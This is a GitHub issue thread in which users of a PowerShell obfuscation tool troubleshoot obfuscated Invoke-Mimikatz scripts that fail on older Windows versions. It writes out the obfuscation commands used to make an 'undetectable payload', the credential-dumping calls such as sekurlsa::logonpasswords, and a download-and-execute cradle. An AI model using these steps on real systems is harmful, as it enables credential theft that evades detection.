PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0...}
BuildVersion                   10.0.10586.672
CLRVersion                     4.0.30319.42000
WSManStackVersion              3.0
PSRemotingProtocolVersion      2.3
SerializationVersion           1.1.0.1

What I've done is running each Token obfuscation stage one after the other and making sure which one failed. After my tests I can tell you that both Type and Argument stages fail. The Argument gives an error similar to what @byt3bl33d3r shows for Windows 8.1 in his last message. The Type stage simply does not finish execution (obfuscation is fine, execution of obfuscated script is not).

Here's a review of everything I did:

cd C:\Users\newlog\Documents\tools\mimikatz\powershell\Invoke-Mimikatz\custom\trialanderror
Import-Module .\<script>.ps1
Invoke-Mimikatz -DumpCreds

#
# 1.mimi_comments.ps1
#

$ Invoke-Obfuscation -ScriptPath '.\Invoke-Mimikatz.ps1' -Command 'Token\Comment\1' -Quiet > 1.mimi_comments.ps1

#
# 2.mimi_comments_whitespace.ps1
#

$ Invoke-Obfuscation -ScriptPath '.\mimi_comments.ps1' -Command 'Token\Whitespace\1' -Quiet > 2.mimi_comments_whitespace.ps1

#
# 3.mimi_comments_whitespace_type.ps1 (EXECUTION DOES NOT WORK - IT DOES NOT FINISH)
#

$ Invoke-Obfuscation -ScriptPath '.\2.mimi_comments_whitespace.ps1' -Command 'Token\Type\1' -Quiet > 3.mimi_comments_whitespace_type.ps1

#
# 4.mimi_comments_whitespace_variable.ps1
#

$ Invoke-Obfuscation -ScriptPath '.\2.mimi_comments_whitespace.ps1' -Command 'Token\Variable\1' -Quiet > 4.mimi_comments_whitespace_variable.ps1

#
# 5.mimi_comments_whitespace_variable_member.ps1
#

$ Invoke-Obfuscation -ScriptPath '.\4.mimi_comments_whitespace_variable.ps1 -Command 'Token\Member\1' -Quiet > 5.mimi_comments_whitespace_variable_member.ps1

#
# 6.mimi_comments_whitespace_variable_member_argument.ps1 (EXECUTION DOES NOT WORK - ERROR MESSAGE)
#

$ Invoke-Obfuscation -ScriptPath '.\5.mimi_comments_whitespace_variable_member.ps1' -Command 'Token\Argument\1' -Quiet > 6.mimi_comments_whitespace_variable_member_argument.ps1

#
# 7.mimi_comments_whitespace_variable_member_command.ps1
#

$ Invoke-Obfuscation -ScriptPath '.\5.mimi_comments_whitespace_variable_member.ps1' -Command 'Token\Command\1' -Quiet > 7.mimi_comments_whitespace_variable_member_command.ps1

#
# 8.mimi_comments_whitespace_variable_member_command_string.ps1
#

$ Invoke-Obfuscation -ScriptPath '.\7.mimi_comments_whitespace_variable_member_command.ps1' -Command 'Token\String\1' -Quiet > 8.mimi_comments_whitespace_variable_member_command_string.ps1

btw, the Argument stage is necessary to get an undetectable payload. Damn!

I attach the error message I get when Invoke-Mimikatz is oobfuscated with the Argument stage: error_msg.txt

So definitively, there's something not working as expected.

Awesome work @danielbohannon It's really amazing what you did here!

[danielbohannon]

Are you still seeing these same issues with the latest commit? I'm still not able to reproduce this issue when applying these obfuscation steps (all level 1 obfuscation for each token type as you outlined above). Not sure what variable component I'm missing here but would love to help close this issue for you guys once I can reproduce it. Thanks for your help and patience.

[vivami]

Hi Daniel,

Thanks for this awesome project! I experience the same issue as @byt3bl33d3r. I obfuscate Invoke-Mimikatz from a Windows 10 1607 machine using your latest version 1.7 of Invoke-Obfuscation. Runs perfectly fine on the Windows 10 box:

PS C:\Users\MD\Documents\Invoke-Obfuscation-master> Import-Module .\MimiDogz_token.ps1
PS C:\Users\MD\Documents\Invoke-Obfuscation-master> INvoke-Mimikatz -DumpCreds

  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */

mimikatz(powershell) # sekurlsa::logonpasswords

Authentication Id : 0 ; 153000 (00000000:000255a8)
Session           : Interactive from 1
--SNIP--

However, below is the output when running this same obfuscated script on a Windows Server 2012 box (PS4.0). Hope this is of use to you. Let me know if I can try anything else:

PS C:\Users\Administrator\Desktop> $PSVersionTable

Name                           Value
----                           -----
PSVersion                      4.0
WSManStackVersion              3.0
SerializationVersion           1.1.0.1
CLRVersion                     4.0.30319.36366
BuildVersion                   6.3.9600.17400
PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0}
PSRemotingProtocolVersion      2.2

PS C:\Users\Administrator\Desktop> Import-Module MimiDogz_token.ps1
PS C:\Users\Administrator\Desktop> INvoke-Mimikatz
Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:438 char:3
+         ${m`EMCPY} =   (  &("{1}{0}" -f'iabLE','VAR') ("5Od"+"K") -vALUEoNLy )::("{0}{ ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:508 char:9
+         ${Cre`A`Te`RE`mOTEtHRE`AD} =   (&("{0}{1}"-f'va','rIable') ("{1}{0}" -f  ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:438 char:3
+         ${m`EMCPY} =   (  &("{1}{0}" -f'iabLE','VAR') ("5Od"+"K") -vALUEoNLy )::("{0}{ ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetDelegateForFunctionPointer" with "2" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:508 char:9
+         ${Cre`A`Te`RE`mOTEtHRE`AD} =   (&("{0}{1}"-f'va','rIable') ("{1}{0}" -f  ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+         [Byte[]]${vA`lue2by`TEs} =  ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g')  ("l1 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+         if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict

Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+         [Byte[]]${vA`lue2by`TEs} =  ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g')  ("l1 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+         if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict

Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+         [Byte[]]${vA`lue2by`TEs} =  ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g')  ("l1 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+         if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict

Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+         [Byte[]]${vA`lue2by`TEs} =  ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g')  ("l1 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+         if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict

Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+         [Byte[]]${vA`lue2by`TEs} =  ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g')  ("l1 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+         if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict

Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+         [Byte[]]${vA`lue2by`TEs} =  ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g')  ("l1 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+         if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict

Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+         [Byte[]]${vA`lue2by`TEs} =  ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g')  ("l1 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+         if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict

Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+         [Byte[]]${vA`lue2by`TEs} =  ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g')  ("l1 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+         if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict

Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+         [Byte[]]${vA`lue2by`TEs} =  ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g')  ("l1 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+         if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict

Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+         [Byte[]]${vA`lue2by`TEs} =  ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g')  ("l1 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+         if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict

Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+         [Byte[]]${vA`lue2by`TEs} =  ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g')  ("l1 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+         if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict

Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+         [Byte[]]${vA`lue2by`TEs} =  ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g')  ("l1 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+         if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict

Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+         [Byte[]]${vA`lue2by`TEs} =  ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g')  ("l1 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+         if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict

Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+         [Byte[]]${vA`lue2by`TEs} =  ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g')  ("l1 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+         if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict

Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+         [Byte[]]${vA`lue2by`TEs} =  ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g')  ("l1 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+         if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict

Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+         [Byte[]]${vA`lue2by`TEs} =  ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g')  ("l1 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+         if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict

Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+         [Byte[]]${vA`lue2by`TEs} =  ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g')  ("l1 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+         if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict

Exception calling "GetBytes" with "1" argument(s): "Unable to cast object of type
'System.Management.Automation.PSObject' to type 'System.Type'."
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:681 char:3
+         [Byte[]]${vA`lue2by`TEs} =  ( &("{3}{1}{0}{2}"-f't-v','E','ArIaBlE','g')  ("l1 ...
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : CatchFromBaseAdapterMethodInvoke

The property 'CoUNT' cannot be found on this object. Verify that the property exists.
At C:\Users\Administrator\Desktop\MimiDogz_token.ps1:683 char:7
+         if (${VALUE1B`Y`T`eS}."Cou`Nt" -eq ${v`ALue2B`Yt`Es}."CoU`NT")
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], PropertyNotFoundException
    + FullyQualifiedErrorId : PropertyNotFoundStrict

[danielbohannon]

Man, this continues to stump me. I'm not seeing this error for PS 2, 3 or 4. I wonder if there's something peculiar to Windows Server 2012. Would you mind uploaded the obfuscated script that you used to get the errors that you posted above? This will help me find out how to best replicate this issue so I can get it fixed. Thanks.

[vivami]

Sure, that script uploaded here: https://cl.ly/jVlg I just tested it on Windows 8.1 (PS 4.0) as well, and it gives the the exact same error(s).

[newlog]

@danielbohannon I cannot confirm, but downloading the ModernIE VMs might help you reproduce the issue. There you will get a standard Windows 7/8/10 machine with their default PowerShell version.

https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

After further testing, I can tell you for sure that some stages are not working on Win7 with the default (I hope) PS while working on Win10. Sorry I cannot give you more feedback than that.

[byt3bl33d3r]

@danielbohannon bump. Any update on this issue?

[danielbohannon]

@byt3bl33d3r -- thanks for holding my feet to the fire :) Unfortunately I've not had a chance to get a VM setup where I can successfully reproduce this issue. I've got a couple long flights in the coming weeks so hopefully I can sink some time into reproducing this issue and getting this resolved. This issue has been open for far longer than I like, so my apologies for that.

[byt3bl33d3r]

@danielbohannon no worries! Thanks for the update! Anything else I can do to help let me know. Cheers man.

[kofa2002]

thank you all for this information

[bwiltse]

I just came across this issue myself, It was powershell in Kali rolling, with powershell 6.1.0, running obfuscating the same payload from Empire in Windows 10 worked without issue.

[dr0pd34d]

I currently have the same problem on two Windows hosts. I used the following command line: Invoke-Obfuscation -ScriptPath 'https://raw.githubusercontent.com/PowerShel lMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1' -Command 'Token\All\1' -Quiet > Kingdom3.ps1

---

On my Windows 10 Hosts with the following Powershell Version: Name Value PSVersion 5.1.17134.228 PSEdition Desktop PSCompatibleVersions {1.0, 2.0, 3.0, 4.0...} BuildVersion 10.0.17134.228 CLRVersion 4.0.30319.42000 WSManStackVersion 3.0 PSRemotingProtocolVersion 2.3 SerializationVersion 1.1.0.1

---

Running the following commands: PS C:\Test> IEX (New-Object Net.WebClient).DownloadString("C:\Test\Kingdom3.ps1") PS C:\Test> INVOKE-MIMIkAtz Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found." At line:825 char:6

• ${GETPRoCadDReSS} = ${UNsafenaTiVEMEtHo`Ds}.("{0}{2}{1} ...
  • CategoryInfo : NotSpecified: (:) [], MethodInvocationException
  • FullyQualifiedErrorId : DotNetMethodException

You cannot call a method on a null-valued expression. At line:832 char:6

• &("{1}{0}{2}"-f'ut','Write-O','put') ${GETprOCaDDREss}."InV ...
  • CategoryInfo : InvalidOperation: (:) [], RuntimeException
  • FullyQualifiedErrorId : InvokeMethodOnNull

